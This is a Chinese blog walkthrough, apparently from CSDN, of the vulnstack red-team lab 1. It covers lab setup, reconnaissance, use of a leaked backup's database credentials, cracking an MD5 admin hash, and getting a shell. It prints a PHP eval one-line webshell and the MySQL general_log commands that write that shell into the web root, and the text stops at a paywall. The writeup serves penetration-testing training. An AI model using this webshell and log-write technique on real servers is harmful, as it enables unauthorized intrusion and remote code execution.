红队攻防知识分享-红日安全团队靶场1

已于 2024-03-02 01:10:07 修改
阅读量8.1k 收藏 23
点赞数 4
分类专栏: CISP-PTE实战模拟 文章标签: 安全
于 2022-03-23 13:33:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beirry/article/details/123187049
版权

红队攻防知识分享-红日安全团队靶场1

环境搭建

靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境拓扑图:
请添加图片描述以下是虚拟机网络配置

虚拟机 网络配置
Windows7 x64 VMnet1:192.168.54.128;VMnet2:192.168.52.143
Win2k3 Measploitable VMnet1:192.168.52.141
Windows Server 2008 R2 x64 VMnet1:192.168.52.138
kali VMnet2:192.168.54.129

刚开机时,需要在Windows7中开启phpstudy,phpstudy在c盘下
在这里插入图片描述

信息收集

通过nmap收集到开启的服务有web服务以及mysql服务
在这里插入图片描述
扫描站点
在这里插入图片描述
经过整理得到三条信息:
1)beifen.rar 站点备份压缩包
2)http://192.168.54.128/phpmyadmin/index.php mysql登录后台页面
3)http://192.168.54.128/phpinfo.php php信息

1)备份压缩包里面有一个命名为yxcms的目录
在这里插入图片描述
从这里我们可以得到站点的架构以及信息
在升级日志中可以得知yxcms版本为1.2.1
在这里插入图片描述

在protected中的config文件里得到mysql的账号密码信息
在这里插入图片描述
2)访问mysql,输入账号密码,成功登录
获取到mysql版本信息
在这里插入图片描述

访问newyxcms库中的yx_admin表得到密码168a73655bfecefdb15b14984dd2ad60,猜测应该是做过md5加密,进行解密
在这里插入图片描述
得到密码:949ba59abbe56e05
在这里插入图片描述

3)phpinfo中,通过路径得知该服务器是Windows系统
在这里插入图片描述

通过查询yxcms版本我们进一步获取信息
后台地址,默认账号密码
在这里插入图片描述
查询yxcms1.2.1已知漏洞
在这里插入图片描述

漏洞利用

数据库弱密码,获取getshell

数据库默认密码root这个就不说了,获取getshell。

select '<?php eval($_POST[shell])?>' into outfile '路径' //需要知道绝对路径

在这里插入图片描述
报错,没有权限。

show variables like '%general%'; //查看全局日志是否开启

在这里插入图片描述

set global general_log=on//开启全局日志

在这里插入图片描述

set global general_log_file="c://phpstudy/www/1.php"//指定新的日志路径

在这里插入图片描述

select '<?php eval($_POST[shell])?>'; //查找一句话木马,会将一句话
最低0.47元/天 解锁文章
beirry
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vultarget-a靶场全面解析(完整版)
问彡心的博客
11-02 8832
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
2024年最新Vulnstack安全内网域渗透靶场1实战_vulnstack靶场(1)
最新发布
2401_84297265的博客
05-03 1143
该内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
靶场(一)
qq_58091216的博客
05-01 3022
一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
内网渗透实战——ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
靶场搭建
weixin_60362505的博客
11-15 2196
1靶场环境搭建
安全靶场(一)学习笔记
qq_45244158的博客
09-22 1979
安全靶场(一)学习笔记
攻防手册,攻防教程
04-20
是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝则是负责防御和应对这些攻击的团队。 以下是攻防教程的一般步骤和内容: 网络侦察:开始通过收集目标组织的信息,包括IP地址、...
goby&社区版-win-64-2.4.7
11-27
包含goby版和社区版
Goby-win-x64-2.4.7版本
07-27
Goby专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
goby-x64-2.4.8(win和linux)
05-16
Goby 是一款基于客户端的安全漏洞扫描工具,适用于、蓝或者渗透测试的场景。与同类产品相比,其主要优势包括高速扫描、低误报率和丰富的外部扩展等。 版 Goby 增加了一系列如 Celerystalk、BloodHound、...
YXcmsApp建站系统 v1.3.6
12-06
1、BugFix:修正后台和会员中心登陆错误后验证码不刷新导致可暴力破解 2、优化:加固安装时候默认生成的加密秘钥 3、BugFix:修正后台和会员中心登陆错误后验证码不刷新导致可暴力破解 4、BugFix:修正后台开启数据库缓存后不能发布、删除、编辑信息 手动升
内网-内网安全攻防-笔记.pdf
09-18
内网-内网安全攻防-笔记.pdf
靶场环境搭建详细步骤
hacker3062的博客
09-01 1800
1、下载好镜像文件。2、直接vmware启动即可。这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)这样win10就可以访问win7,但不能直接访问win08和win2k3。三台靶机的初始密码都是hongrisec@2019 ,初次登录需要
靶场1
woshicainiao666的博客
01-13 1377
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
靶场
weixin_44339234的博客
07-11 1382
新手学习记录,有误之处多多指点
靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1345
靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
靶场第四关
红队是青春
12-02 3425
靶场第四关 一、环境配置 大家好安全靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 靶场学习路径,可参考 st漏洞利用 phpmyadmin getshell tomcat 漏洞利用 docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透 WEB-Ubuntu docker开启 sudo docker
靶场系列一
weixin_54626591的博客
01-22 110
靶场系列一
靶场php study
08-24
PHPStudy是一款集成了Apache、MySQL和PHP的软件套件,用于在Windows平台上搭建PHP开发环境的工具。它提供了一键安装和配置的功能,方便用户快速搭建本地开发环境。 关于你提到的关于网站内部写入木马的问题,根据引用和引用的内容,可以通过修改PHPStudy的配置文件,将志文件写入指定位置,并在该位置插入一句话木马。这样,当访问志文件时,就能证明文件写入成功。而要在网站内部写入木马,需要获取网站的绝对路径,可以通过报错或查询PHP配置信息等方法来获取。最后,可以使用MySQL的select语句将木马写入到网站的根目录,如引用中所述。 总结起来,PHPStudy是用于搭建PHP开发环境的工具,而关于网站内部写入木马的过程,可以通过修改配置文件、获取网站路径和使用MySQL语句等方法来实现。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [内网渗透靶场1(ATK&CK评估实战靶场一)](https://blog.csdn.net/qq_45780190/article/details/122951320)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beirry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值